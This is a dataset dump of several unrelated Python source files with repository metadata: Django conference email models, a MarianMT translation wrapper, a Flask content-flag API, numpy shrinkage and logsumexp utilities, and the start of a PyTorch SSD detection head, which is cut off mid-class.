marvinxu99/dccnsys
|
8f53728d06b859cace42cc84bc190bc89950d252
|
[
"MIT"
] | 16
|
2020-03-15T15:33:30.000Z
|
2021-11-26T21:57:27.000Z
|
wwwdccn/chair_mail/models.py
|
marvinxu99/dccnsys
|
8f53728d06b859cace42cc84bc190bc89950d252
|
[
"MIT"
] | 11
|
2019-04-27T19:15:43.000Z
|
2022-03-11T23:43:08.000Z
|
wwwdccn/chair_mail/models.py
|
marvinxu99/dccnsys
|
8f53728d06b859cace42cc84bc190bc89950d252
|
[
"MIT"
] | 10
|
2020-03-14T09:25:39.000Z
|
2022-02-21T16:46:33.000Z
|
from django.conf import settings
from django.core.mail import send_mail
from django.db import models
from django.db.models import ForeignKey, OneToOneField, TextField, CharField, \
SET_NULL, CASCADE, BooleanField, UniqueConstraint
from django.db.models.signals import post_save
from django.dispatch import receiver
from django.template import Template, Context
from django.utils import timezone
from markdown import markdown
from html2text import html2text
from chair_mail.context import get_conference_context, get_user_context, \
get_submission_context, get_frame_context
from conferences.models import Conference
from submissions.models import Submission
from users.models import User
MSG_TYPE_USER = 'user'
MSG_TYPE_SUBMISSION = 'submission'
MESSAGE_TYPE_CHOICES = (
(MSG_TYPE_USER, 'Message to users'),
(MSG_TYPE_SUBMISSION, 'Message to submissions'),
)
class EmailFrame(models.Model):
text_html = models.TextField()
text_plain = models.TextField()
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)  # auto_now_add would freeze this at creation time
created_by = models.ForeignKey(User, on_delete=models.SET_NULL, null=True)
conference = models.ForeignKey(Conference, on_delete=models.CASCADE)
@staticmethod
def render(frame_template, conference, subject, body):
context_data = get_frame_context(conference, subject, body)
context = Context(context_data, autoescape=False)
return Template(frame_template).render(context)
def render_html(self, subject, body):
return EmailFrame.render(
self.text_html, self.conference, subject, body
)
def render_plain(self, subject, body):
text_plain = self.text_plain
if not text_plain:
text_plain = html2text(self.text_html)
return EmailFrame.render(
text_plain, self.conference, subject, body
)
class EmailSettings(models.Model):
frame = models.ForeignKey(EmailFrame, on_delete=models.SET_NULL, null=True)
conference = models.OneToOneField(
Conference, null=True, blank=True, on_delete=models.CASCADE,
related_name='email_settings',
)
class GroupMessage(models.Model):
subject = models.CharField(max_length=1024)
body = models.TextField()
conference = models.ForeignKey(
Conference,
on_delete=models.CASCADE,
related_name='sent_group_emails',
)
sent_at = models.DateTimeField(auto_now_add=True)
sent_by = models.ForeignKey(
User, on_delete=models.SET_NULL, null=True,
related_name='sent_group_emails'
)
sent = models.BooleanField(default=False)
@property
def message_type(self):
return ''
class UserMessage(GroupMessage):
recipients = models.ManyToManyField(User, related_name='group_emails')
group_message = models.OneToOneField(
GroupMessage, on_delete=models.CASCADE, parent_link=True)
@property
def message_type(self):
return MSG_TYPE_USER
@staticmethod
def create(subject, body, conference, objects_to):
msg = UserMessage.objects.create(
subject=subject, body=body, conference=conference)
for user in objects_to:
msg.recipients.add(user)
msg.save()
return msg
def send(self, sender):
# 1) Update status and save sender chair user:
self.sent = False
self.sent_by = sender
self.save()
# 2) For each user, we render this template with the given context,
# and then build the whole message by inserting this body into
# the frame. Plain-text version is also formed from HTML.
frame = self.conference.email_settings.frame
conference_context = get_conference_context(self.conference)
for user in self.recipients.all():
context = Context({
**conference_context,
**get_user_context(user, self.conference)
}, autoescape=False)
email = EmailMessage.create(
group_message=self.group_message,
user_to=user,
context=context,
frame=frame
)
email.send(sender)
# 3) Update self status, write sending timestamp
self.sent_at = timezone.now()
self.sent = True
self.save()
return self
class SubmissionMessage(GroupMessage):
recipients = models.ManyToManyField(
Submission, related_name='group_emails')
group_message = models.OneToOneField(
GroupMessage, on_delete=models.CASCADE, parent_link=True)
@property
def message_type(self):
return MSG_TYPE_SUBMISSION
@staticmethod
def create(subject, body, conference, objects_to):
msg = SubmissionMessage.objects.create(
subject=subject, body=body, conference=conference)
for submission in objects_to:
msg.recipients.add(submission)
msg.save()
return msg
def send(self, sender):
# 1) Update status and save sender chair user:
self.sent = False
self.sent_by = sender
self.save()
# 2) For each user, we render this template with the given context,
# and then build the whole message by inserting this body into
# the frame. Plain-text version is also formed from HTML.
frame = self.conference.email_settings.frame
conference_context = get_conference_context(self.conference)
for submission in self.recipients.all():
submission_context = get_submission_context(submission)
for author in submission.authors.all():
user = author.user
context = Context({
**conference_context,
**submission_context,
**get_user_context(user, self.conference)
}, autoescape=False)
email = EmailMessage.create(
group_message=self.group_message,
user_to=user,
context=context,
frame=frame
)
email.send(sender)
# 3) Update self status, write sending timestamp
self.sent_at = timezone.now()
self.sent = True
self.save()
return self
def get_group_message_model(msg_type):
return {
MSG_TYPE_USER: UserMessage,
MSG_TYPE_SUBMISSION: SubmissionMessage,
}[msg_type]
def get_message_leaf_model(msg):
"""If provided a `GroupMessage` instance, check the inheritance, find
the most descent child and return it. Now the possible leaf models are
`UserMessage` and `SubmissionMessage`."""
if hasattr(msg, 'usermessage'):
return msg.usermessage
elif hasattr(msg, 'submissionmessage'):
return msg.submissionmessage
# Also check, maybe a message is already a leaf:
if isinstance(msg, UserMessage) or isinstance(msg, SubmissionMessage):
return msg
# If neither succeeded, raise an error:
raise TypeError(f'Not a group message: {type(msg)}')  # braces were missing, so the type was never interpolated
class EmailMessage(models.Model):
subject = models.TextField(max_length=1024)
text_plain = models.TextField()
text_html = models.TextField()
user_to = models.ForeignKey(
User,
on_delete=models.CASCADE,
related_name='emails'
)
sent_at = models.DateTimeField(auto_now_add=True)
sent = models.BooleanField(default=False)
sent_by = models.ForeignKey(
User,
on_delete=models.SET_NULL, null=True,
related_name='sent_emails'
)
group_message = models.ForeignKey(
GroupMessage,
on_delete=models.SET_NULL,
null=True,
related_name='messages',
)
@staticmethod
def create(group_message, user_to, context, frame):
template_body = Template(group_message.body)
template_subject = Template(group_message.subject)
body_md = template_body.render(context)
body_html = markdown(body_md)
subject = template_subject.render(context)
return EmailMessage.objects.create(
user_to=user_to,
group_message=group_message,
subject=subject,
text_html=frame.render_html(subject, body_html),
text_plain=frame.render_plain(subject, body_md),
)
def send(self, sender):
if not self.sent:
from_email = settings.DEFAULT_FROM_EMAIL
# recipient_list must be a list of address strings, not User instances
send_mail(self.subject, self.text_plain, from_email, [self.user_to.email],
html_message=self.text_html)
self.sent_at = timezone.now()
self.sent_by = sender
self.sent = True
self.save()
return self
class SystemNotification(models.Model):
"""This model represents a system notification fired on a specific event.
The model itself doesn't define the circumstances in which the message
must be sent, which are subject to views.
Notification is defined with a mandatory name, optional description,
subject and template. If template is not assigned or subject is not
specified, messages won't be sent.
Notification can also be turned off with `is_active` flag field.
"""
ASSIGN_STATUS_SUBMIT = 'assign_status_submit'
ASSIGN_STATUS_REVIEW = 'assign_status_review'
ASSIGN_STATUS_ACCEPT = 'assign_status_accept'
ASSIGN_STATUS_REJECT = 'assign_status_reject'
ASSIGN_STATUS_INPRINT = 'assign_status_inprint'
ASSIGN_STATUS_PUBLISHED = 'assign_status_publish'
NAME_CHOICES = (
(ASSIGN_STATUS_REVIEW, 'Assign status REVIEW to the paper'),
(ASSIGN_STATUS_SUBMIT, 'Assign status SUBMIT to the paper'),
(ASSIGN_STATUS_ACCEPT, 'Assign status ACCEPT to the paper'),
(ASSIGN_STATUS_REJECT, 'Assign status REJECT to the paper'),
(ASSIGN_STATUS_INPRINT, 'Assign status IN-PRINT to the paper'),
(ASSIGN_STATUS_PUBLISHED, 'Assign status PUBLISHED to the paper'),
)
name = CharField(max_length=64, choices=NAME_CHOICES)
subject = CharField(max_length=1024, blank=True)
is_active = BooleanField(default=False)
type = CharField(max_length=64, choices=MESSAGE_TYPE_CHOICES, blank=False)
body = TextField(blank=True)
conference = ForeignKey(Conference, related_name='notifications',
on_delete=CASCADE)
class Meta:
constraints = [
UniqueConstraint(fields=['conference', 'name'], name='unique_name'),
]
def send(self, recipients, sender=None):
if self.is_active and self.body and self.subject:
message_class = get_group_message_model(self.type)
message = message_class.create(
self.subject, self.body, self.conference, recipients)
message.send(sender)
DEFAULT_NOTIFICATIONS_DATA = {
SystemNotification.ASSIGN_STATUS_REVIEW: {
'subject': 'Submission #{{ paper_id }} is under review',
'type': MSG_TYPE_SUBMISSION,
'body': '''Dear {{ username }},
your submission #{{ paper_id }} **"{{ paper_title }}"** is assigned for the review.
Reviews are expected to be ready at **{{ rev_end_date|time:"H:i:s" }}**.'''
},
SystemNotification.ASSIGN_STATUS_SUBMIT: {
'subject': 'Submission #{{ paper_id }} is in draft editing state',
'type': MSG_TYPE_SUBMISSION,
'body': '''Dear {{ username }},
your submission #{{ paper_id }} **"{{ paper_title }}"** is in draft editing
state.
At this point you can modify review manuscript, title and other data if you
need.'''
},
SystemNotification.ASSIGN_STATUS_ACCEPT: {
'subject': 'Submission #{{ paper_id }} was accepted',
'type': MSG_TYPE_SUBMISSION,
'body': '''Dear {{ username }},
congratulations, your submission #{{ paper_id }} **"{{ paper_title }}"** was
accepted for the conference.'''
},
SystemNotification.ASSIGN_STATUS_REJECT: {
'subject': 'Submission #{{ paper_id }} was rejected',
'type': MSG_TYPE_SUBMISSION,
'body': '''Dear {{ username }},
unfortunately your submission #{{ paper_id }} **"{{ paper_title }}"**
was rejected according to the double-blinded review.
'''
},
SystemNotification.ASSIGN_STATUS_INPRINT: {
'subject': 'Submission #{{ paper_id }} is in print',
'type': MSG_TYPE_SUBMISSION,
'body': '''Dear {{ username }},
your submission #{{ paper_id }} **"{{ paper_title }}"** camera-ready was
sent to the publisher. We will let you know when the paper will be published.
'''
},
SystemNotification.ASSIGN_STATUS_PUBLISHED: {
'subject': 'Submission #{{ paper_id }} was published',
'type': MSG_TYPE_SUBMISSION,
'body': '''Dear {{ username }},
we are glad to inform you that your submission #{{ paper_id }}
**"{{ paper_title }}"** was published.
'''
},
}
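A hedged sketch of how a view might fire one of these notifications; conference, submission, and request are assumed to exist in the calling view and are not defined in this file:

# Hypothetical view-side usage: fetch the conference's "accept"
# notification and send it for a single submission.
notification = SystemNotification.objects.get(
    conference=conference,
    name=SystemNotification.ASSIGN_STATUS_ACCEPT,
)
notification.send([submission], sender=request.user)
# send() silently does nothing unless is_active is set and both
# body and subject are non-empty, per the guard in send() above.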
| 35.157609
| 83
| 0.659762
| 1,489
| 12,938
| 5.545332
| 0.162525
| 0.043599
| 0.024706
| 0.01526
| 0.45743
| 0.401114
| 0.341407
| 0.312583
| 0.29587
| 0.25651
| 0
| 0.002569
| 0.247952
| 12,938
| 367
| 84
| 35.253406
| 0.846043
| 0.09646
| 0
| 0.358885
| 0
| 0
| 0.159488
| 0.00576
| 0
| 0
| 0
| 0
| 0
| 1
| 0.052265
| false
| 0
| 0.04878
| 0.017422
| 0.320557
| 0.003484
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a01dc69fc961ecf3abcdcc4efc76fa8f20eeb48a
| 1,753
|
py
|
Python
|
translator/model.py
|
marco-nicola/python-translator
|
6a559874c9899e52a4cac9c2954dcca6b638f002
|
[
"Apache-2.0"
] | null | null | null |
translator/model.py
|
marco-nicola/python-translator
|
6a559874c9899e52a4cac9c2954dcca6b638f002
|
[
"Apache-2.0"
] | null | null | null |
translator/model.py
|
marco-nicola/python-translator
|
6a559874c9899e52a4cac9c2954dcca6b638f002
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2021 Marco Nicola
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from typing import Optional
from transformers import AutoTokenizer, AutoModelForSeq2SeqLM, MarianMTModel, \
MarianTokenizer
from .config import ConfigLanguageModel
class Model:
def __init__(self, conf: ConfigLanguageModel, models_path: str):
self._conf: ConfigLanguageModel = conf
self._models_path: str = models_path
self._tokenizer: Optional[MarianTokenizer] = None
self._model: Optional[MarianMTModel] = None
def load(self) -> None:
logging.info(f'[{self._conf.model}] - Loading tokenizer...')
self._tokenizer = AutoTokenizer.from_pretrained(
self._conf.model, cache_dir=self._models_path)
logging.info(f'[{self._conf.model}] - Loading model...')
self._model = AutoModelForSeq2SeqLM.from_pretrained(
self._conf.model, cache_dir=self._models_path)
logging.info(f'[{self._conf.model}] - Loaded.')
def translate(self, text: str) -> str:
tokenized = self._tokenizer(text, return_tensors="pt", padding=True)
outputs = self._model.generate(**tokenized)
return self._tokenizer.decode(outputs[0], skip_special_tokens=True)
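A minimal usage sketch, assuming ConfigLanguageModel exposes a model attribute naming a MarianMT checkpoint; the checkpoint id and constructor call below are illustrative, since .config is not shown here:

conf = ConfigLanguageModel(model='Helsinki-NLP/opus-mt-en-de')  # assumed constructor
translator = Model(conf, models_path='./models')
translator.load()                          # downloads/caches tokenizer and model
print(translator.translate('Hello, world!'))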
| 38.108696
| 79
| 0.718768
| 220
| 1,753
| 5.581818
| 0.490909
| 0.045603
| 0.052932
| 0.039088
| 0.15228
| 0.15228
| 0.15228
| 0.120521
| 0.120521
| 0.120521
| 0
| 0.007714
| 0.186537
| 1,753
| 45
| 80
| 38.955556
| 0.853436
| 0.312607
| 0
| 0.086957
| 0
| 0
| 0.095718
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.130435
| false
| 0
| 0.173913
| 0
| 0.391304
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a021e7c81cd72a8cb8466d95bea774bd4667239f
| 1,692
|
py
|
Python
|
src/api/content_flag.py
|
Viewly/alpha-2
|
6b6d827197489164d8c4bde4f4d591dcec5a2163
|
[
"MIT"
] | null | null | null |
src/api/content_flag.py
|
Viewly/alpha-2
|
6b6d827197489164d8c4bde4f4d591dcec5a2163
|
[
"MIT"
] | 1
|
2021-05-07T06:26:16.000Z
|
2021-05-07T06:26:16.000Z
|
src/api/content_flag.py
|
Viewly/alpha-2
|
6b6d827197489164d8c4bde4f4d591dcec5a2163
|
[
"MIT"
] | null | null | null |
import datetime as dt
import json
from flask_restful import (
Resource,
reqparse,
)
from flask_security import current_user
from marshmallow_sqlalchemy import ModelSchema
from .utils import auth_required
from .. import db
from ..core.utils import log_exception
from ..models import ContentFlag
class FlagSchema(ModelSchema):
class Meta:
model = ContentFlag
include_fk = True
flag_schema = FlagSchema()
parser = reqparse.RequestParser()
parser.add_argument('video_id', type=str, required=True)
parser.add_argument('flag_type', type=str)
class FlagApi(Resource):
method_decorators = [auth_required]
def get(self):
args = parser.parse_args()
flag = \
(db.session.query(ContentFlag)
.filter(ContentFlag.video_id == args['video_id'],
ContentFlag.user_id == current_user.id)
.first())
return flag_schema.dump(flag).data or ({}, 404)
def put(self):
args = parser.parse_args()
try:
assert args['flag_type'] in \
['xxx', 'hate', 'scam', 'spam', 'plagiarism'], 'Invalid flag'
flag = ContentFlag(
user_id=current_user.id,
video_id=args['video_id'],
flag_type=args['flag_type'],
created_at=dt.datetime.utcnow(),
)
db.session.add(flag)
db.session.commit()
except AssertionError as e:
log_exception()
return dict(message=str(e)), 400
except Exception as e:
log_exception()
return dict(message=str(e)), 500
return flag_schema.dump(flag).data
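A hedged sketch of registering this resource with flask_restful; the Flask app object and the URL path are assumptions, since the application factory is not part of this file:

from flask_restful import Api

api = Api(app)                        # `app` is the Flask application (assumed)
api.add_resource(FlagApi, '/flags')   # GET looks up a flag, PUT creates one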
| 26.030769
| 77
| 0.60461
| 193
| 1,692
| 5.134715
| 0.414508
| 0.035318
| 0.034309
| 0.038345
| 0.272452
| 0.189707
| 0.072654
| 0.072654
| 0.072654
| 0
| 0
| 0.007513
| 0.291962
| 1,692
| 64
| 78
| 26.4375
| 0.8197
| 0
| 0
| 0.08
| 0
| 0
| 0.052009
| 0
| 0
| 0
| 0
| 0
| 0.04
| 1
| 0.04
| false
| 0
| 0.18
| 0
| 0.38
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
a0220e4b4dae9e864bc6a43965e05ecf1eb56be9
| 13,231
|
py
|
Python
|
cgmodsel/utils.py
|
franknu/cgmodsel
|
b008ed88e4f10205ee0ff5e9433d5426c1d5ff6a
|
[
"MIT"
] | 1
|
2020-09-01T08:39:14.000Z
|
2020-09-01T08:39:14.000Z
|
cgmodsel/utils.py
|
franknu/cgmodsel
|
b008ed88e4f10205ee0ff5e9433d5426c1d5ff6a
|
[
"MIT"
] | null | null | null |
cgmodsel/utils.py
|
franknu/cgmodsel
|
b008ed88e4f10205ee0ff5e9433d5426c1d5ff6a
|
[
"MIT"
] | 1
|
2020-09-04T13:35:41.000Z
|
2020-09-04T13:35:41.000Z
|
# -*- coding: utf-8 -*-
"""
Copyright: Frank Nussbaum (frank.nussbaum@uni-jena.de)
This file contains various functions used in the module including
- sparse norms and shrinkage operators
- a stable logsumexp implementation
- array printing-method that allows pasting the output into Python code
"""
import numpy as np
#################################################################################
# norms and shrinkage operators
#################################################################################
try:
# the following requires setup
# import os
# os.system('python cyshrink/setup.py build_ext --inplace')
# TODO(franknu): configure n_threads/interface
from cyshrink.shrink.shrink import grp as grp_soft_shrink
from cyshrink.shrink.shrink import grp_weight as grp_soft_shrink_weight
print('successfully imported shrink.shrink')
except Exception as e:
print(e)
# from cyshrink.shrink.shrink import grp_weight as grp_soft_shrink_weight2
# naive and slow implementations
print('''
Failed to import Cython shrink functions, setup is required...
using slower native Python functions instead''')
def grp_soft_shrink(mat, tau, glims, off=False):
"""just a wrapper for grp_soft_shrink_weight with weights=None"""
return grp_soft_shrink_weight(mat, tau, glims, off=off, weights=None)  # pass the caller's off flag through (was hard-coded to False)
def grp_soft_shrink_weight(mat, tau,
glims,
off=False,
weights=None):
"""
calculate (group-)soft-shrinkage.
Args:
mat (np.array): matrix.
tau (float): non-negative shrinkage parameter.
off (bool): if True, do not shrink diagonal entries.
glims: group delimiters (cumulative sizes of groups).
weights (optional): weights for weighted l_{1,2} norm/shrinkage.
Returns:
tuple: shrunken matrix, (group) l_{1,2}-norm of shrunken matrix.
Note:
this code could be made much faster
(by parallelizing loops and more efficient storage access).
"""
shrinkednorm = 0
# if glims is None:
n_groups = len(glims) - 1
if glims[-1] == n_groups: # each group has size 1
tmp = np.abs(mat)
if not weights is None: # weighted l1-norm
# tmp = np.multiply(tmp, weights).flatten
tmp -= tau * weights
else:
tmp -= tau
tmp[tmp < 1e-25] = 0
shrinked = np.multiply(np.sign(mat), tmp)
l1norm = np.sum(np.abs(shrinked.flatten()))
if off:
l1norm -= np.sum(np.abs(np.diag(shrinked)))
shrinked -= np.diag(np.diag(shrinked))
shrinked += np.diag(np.diag(mat))
return shrinked, l1norm
# group soft shrink
if weights is None:
weights = np.ones(mat.shape) # TODO(franknu): improve style
tmp = np.empty(mat.shape)
for i in range(n_groups):
for j in range(n_groups):
# TODO(franknu): use symmetry
group = mat[glims[i]:glims[i + 1], glims[j]:glims[j + 1]]
if (i == j) and off:
tmp[glims[i]:glims[i + 1], glims[i]:glims[i + 1]] = group
continue
gnorm = np.linalg.norm(group, 'fro')
w_ij = tau * weights[i,j]
if gnorm <= w_ij:
tmp[glims[i]:glims[i + 1],
glims[j]:glims[j + 1]] = np.zeros(group.shape)
else:
tmp[glims[i]:glims[i+1], glims[j]:glims[j+1]] = \
group * (1 - w_ij / gnorm)
shrinkednorm += weights[i,j] * (1 - w_ij / gnorm) * gnorm
return tmp, shrinkednorm
def l21norm(mat, glims=None, off=False, weights=None):
"""
calculate l_{1,2}-norm.
Args:
mat (np.array): matrix.
off (bool): if True, do not shrink diagonal entries.
glims: group delimiters (cumulative sizes of groups); if None,
the plain l1-norm is computed instead of the group l_{1,2}-norm.
weights (optional): weights for weighted l_{1,2} norm.
Returns:
float: (group) l_{1,2}-norm.
"""
if glims is None:
# calculate regular l1-norm
tmp = np.abs(mat) # tmp is copy, can do this inplace by specifying out
if not weights is None: # weighted l1-norm
tmp = np.multiply(tmp, weights).flatten()  # note the call: without () this bound the method instead of flattening
tmp = np.sum(tmp)
if off:
tmp -= np.sum(np.diag(np.abs(mat)))
return tmp
n_groups = len(glims) - 1
l21sum = 0
if weights is None:
for i in range(n_groups):
for j in range(i):
group = mat[glims[i]:glims[i + 1], glims[j]:glims[j + 1]]
l21sum += np.linalg.norm(group, 'fro')
else:
for i in range(n_groups):
for j in range(i):
group = mat[glims[i]:glims[i + 1], glims[j]:glims[j + 1]]
l21sum += weights[i,j] * np.linalg.norm(group, 'fro')
l21sum *= 2 # use symmetry
if not off:
for i in range(n_groups):
group = mat[glims[i]:glims[i + 1], glims[i]:glims[i + 1]]
l21sum += np.linalg.norm(group, 'fro')
return l21sum
###############################################################################
# stable implementation of logsumexp etc.
###############################################################################
#from scipy.special import logsumexp
def _exp_shiftedmax(array, axis=None):
"""calculate exponentials of array shifted by its max, avoiding overflow
by subtracting maximum before"""
a_max = np.amax(array, axis=axis, keepdims=True)
if a_max.ndim > 0:
a_max[~np.isfinite(a_max)] = 0
elif not np.isfinite(a_max):
a_max = 0
# print((a-a_max).shape)
exp_shiftedamax = np.exp(array - a_max)
# last line: a_max is repeated columnwise (if axis = 1)
return exp_shiftedamax, a_max
def logsumexp(array, axis=None, keepdims=True):
"""Compute the log of the sum of exponentials of input elements.
Args:
array (np.array): array on which to compute logsumexp.
axis (int): axis along which to compute logsumexp.
keepdims (bool): passed to np.sum.
Returns:
np.array: logsumexp
Note:
This is an adaptation of logsumexp in scipy.special (v1.1.0)
"""
exp_shifted, a_max = _exp_shiftedmax(array, axis=axis)
# suppress warnings about log of zero
with np.errstate(divide='ignore'):
summed = np.sum(exp_shifted, axis=axis, keepdims=keepdims)
out = np.log(summed)
if not keepdims:
a_max = np.squeeze(a_max, axis=axis)
out += a_max
return out
def _logsumexp_and_conditionalprobs(array):
"""return logsumexp and conditional probabilities from array a
that has the same shape as the discrete data in dummy-representation"""
exp_shifted, a_max = _exp_shiftedmax(array, axis=1)
summed = np.sum(exp_shifted, axis=1, keepdims=True) # entries always > 1
# suppress warnings about log of zero
with np.errstate(divide='ignore'):
out_logsumexp = np.log(summed)
out_logsumexp += a_max
# node conditional probabilities
size = array.shape[1]
out_conditionalprobs = np.divide(exp_shifted,
np.dot(summed, np.ones((1, size))))
# unstable = np.log(np.sum(np.exp(a), axis = 1)).reshape((a.shape[0], 1))
# diff = unstable - out_logsumexp
# print (unstable)
# for i in range(unstable.shape[0]):
# if abs(diff[i, 0]) > 10e-5:
# print('a', a[i, :])
# print('unstable', unstable[i, 0])
# print('stable', out_logsumexp[i, 0])
# break
# assert np.linalg.norm(unstable - out_logsumexp) < 10E-5
# print(out_logsumexp)
# print(out_logsumexp[:1, 0])
# assert 1 == 0
out_logsumexp = np.squeeze(out_logsumexp)
return out_logsumexp, out_conditionalprobs
def _logsumexp_condprobs_red(array):
"""normalization and conditional probabilities for reduced levels,
a ... two-dimensional array"""
a_max = np.amax(array, axis=1, keepdims=True)
a_max = np.maximum(a_max, 0)
# last line: account for missing column with probs exp(0) for 0th level
if a_max.ndim > 0:
a_max[~np.isfinite(a_max)] = 0
elif not np.isfinite(a_max):
a_max = 0
exp_shifted = np.exp(array - a_max) # a_max is repeated columnwise (axis=1)
# calc column vector s of (shifted) normalization sums
# note that entries always > 1, since one summand in each col is exp(0)
summed = np.sum(exp_shifted, axis=1, keepdims=True)
summed += np.exp(-a_max) # add values from missing 0th column
# suppress warnings about log of zero
with np.errstate(divide='ignore'):
out_logsumexp = np.log(summed)
out_logsumexp += a_max
out_logsumexp = np.squeeze(out_logsumexp)
# node conditional probabilities, required for gradient
size = array.shape[1]
out_conditionalprobs = np.divide(exp_shifted,
np.dot(summed, np.ones((1, size))))
# note: log of this is not stable if probabilities close to zero
# - use logsumexp instead for calculating plh value
return out_logsumexp, out_conditionalprobs
###############################################################################
# some conversion functions for representations of discrete data
###############################################################################
def dummy_to_index_single(dummy_x, sizes):
"""convert dummy to index representation"""
offset = 0
ind = np.empty(len(sizes), dtype=int)  # np.int is deprecated/removed in recent NumPy
for i, size_r in enumerate(sizes):
for j in range(size_r):
if dummy_x[offset + j] == 1:
ind[i] = j
break
offset += size_r
return ind
def dummy_to_index(dummy_data, sizes):
"""convert dummy to index representation"""
n_data, ltot = dummy_data.shape
assert ltot == sum(sizes)
n_cat = len(sizes)
index_data = np.empty((n_data, n_cat), dtype=int)
for k in range(n_data):
offset = 0
for i, size_r in enumerate(sizes):
for j in range(size_r):
if dummy_data[offset + j] == 1:
index_data[k, i] = j
break
offset += size_r
return index_data
#def dummypadded_to_unpadded(dummy_data, n_cat):
# """remove convert dummy to index representation"""
# unpadded = np.empty(n_cat)
# for i,x in enumerate(dummy_data):
# if i % 2 == 1:
# unpadded[i // 2] = x
# return unpadded
def index_to_dummy(idx, glims, ltot):
"""convert index to dummy representation"""
dummy_data = np.zeros(ltot)
for i, ind in enumerate(idx):
dummy_data[glims[i] + ind] = 1
return dummy_data
def dummy2dummyred(dummy_data, glims):
"""convert dummy to reduced dummy representation"""
return np.delete(dummy_data, glims[:-1], 1)
###############################################################################
# testing utilities
###############################################################################
def strlistfrom(array, rnd=2):
"""a convenient representation for printing out numpy array
s.t. it can be reused as a list"""
string = np.array2string(array, precision=rnd, separator=',')
string = 'np.array(' + string.translate({ord(c): None for c in '\n '}) + ')'
return string
def tomatlabmatrix(mat):
"""print numpy matrix in a way that can be pasted into MATLAB code."""
nrows, ncols = mat.shape
string = "["
for i in range(nrows):
string += "["
for j in range(ncols):
string += str(mat[i, j]) + " "
string += "];"
string = string[:-1] + "]"
print(string)
def frange(start, stop, step):
"""a float range function"""
i = start
while i < stop:
yield i
i += step
if __name__ == '__main__':
SIZES = [2, 2, 2]
GLIMS = [0, 2, 4, 6]
LTOT = 6
IND = [0, 0, 1]
DUMMY = index_to_dummy(IND, GLIMS, LTOT)
IND2 = dummy_to_index_single(DUMMY, SIZES)
MAT = np.arange(6).reshape((3, 2))
RES = _logsumexp_condprobs_red(MAT)
print(RES)
# res should be
# (array([ 1.55144471, 3.34901222, 5.31817543]), array([[ 0.21194156, 0.57611688],
# [ 0.25949646, 0.70538451],
# [ 0.26762315, 0.72747516]]))
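A small worked check of the pure-Python fallback above, assuming the Cython import failed; the expected values follow directly from the soft-thresholding formula, not from the original file:

# Two size-1 groups (glims=[0, 1, 2]), so the plain l1 branch fires.
M = np.array([[3.0, -0.5],
              [0.2, -2.0]])
shrunk, norm = grp_soft_shrink_weight(M, tau=1.0, glims=[0, 1, 2])
# entries with |m| <= tau collapse to 0, the rest move toward 0 by tau:
# shrunk == [[2.0, 0.0], [0.0, -1.0]] and norm == 3.0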
| 33.752551
| 90
| 0.542438
| 1,645
| 13,231
| 4.26383
| 0.210942
| 0.015968
| 0.014115
| 0.015398
| 0.359139
| 0.294554
| 0.258055
| 0.244226
| 0.223981
| 0.201739
| 0
| 0.023121
| 0.307006
| 13,231
| 391
| 91
| 33.838875
| 0.741848
| 0.340791
| 0
| 0.331522
| 0
| 0
| 0.030249
| 0
| 0
| 0
| 0
| 0.005115
| 0.005435
| 1
| 0.076087
| false
| 0
| 0.027174
| 0
| 0.179348
| 0.027174
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4e428e1c353f9ae16acebfc45bfab7a9a4bd2704
| 2,081
|
py
|
Python
|
ssd/modeling/head/ssd_head.py
|
tkhe/ssd-family
|
a797ec36fda59549aff54419c105813c33d8cdd3
|
[
"MIT"
] | 1
|
2019-07-12T02:21:24.000Z
|
2019-07-12T02:21:24.000Z
|
ssd/modeling/head/ssd_head.py
|
tkhe/ssd-family
|
a797ec36fda59549aff54419c105813c33d8cdd3
|
[
"MIT"
] | null | null | null |
ssd/modeling/head/ssd_head.py
|
tkhe/ssd-family
|
a797ec36fda59549aff54419c105813c33d8cdd3
|
[
"MIT"
] | null | null | null |
import torch.nn as nn
import torch.nn.functional as F
from ssd.modeling.anchor import make_anchor_generator
from ssd.utils import bbox
from .inference import make_post_processor
from .loss import make_loss_evaluator
from .predictor import make_ssd_predictor
class SSDHead(nn.Module):
def __init__(self, cfg, in_channels):
super(SSDHead, self).__init__()
num_classes = cfg.MODEL.NUM_CLASSES
anchors_per_location = [
len(aspect_ratio) * 2 + 2
for aspect_ratio in cfg.MODEL.ANCHOR.ASPECT_RATIOS
]
self.predictor = make_ssd_predictor(cfg, in_channels, anchors_per_location, num_classes)
self.loss_evaluator = make_loss_evaluator(cfg)
self.post_processor = make_post_processor(cfg)
self.anchor_generator = make_anchor_generator(cfg)
self.center_variance = cfg.MODEL.CENTER_VARIANCE
self.size_variance = cfg.MODEL.SIZE_VARIANCE
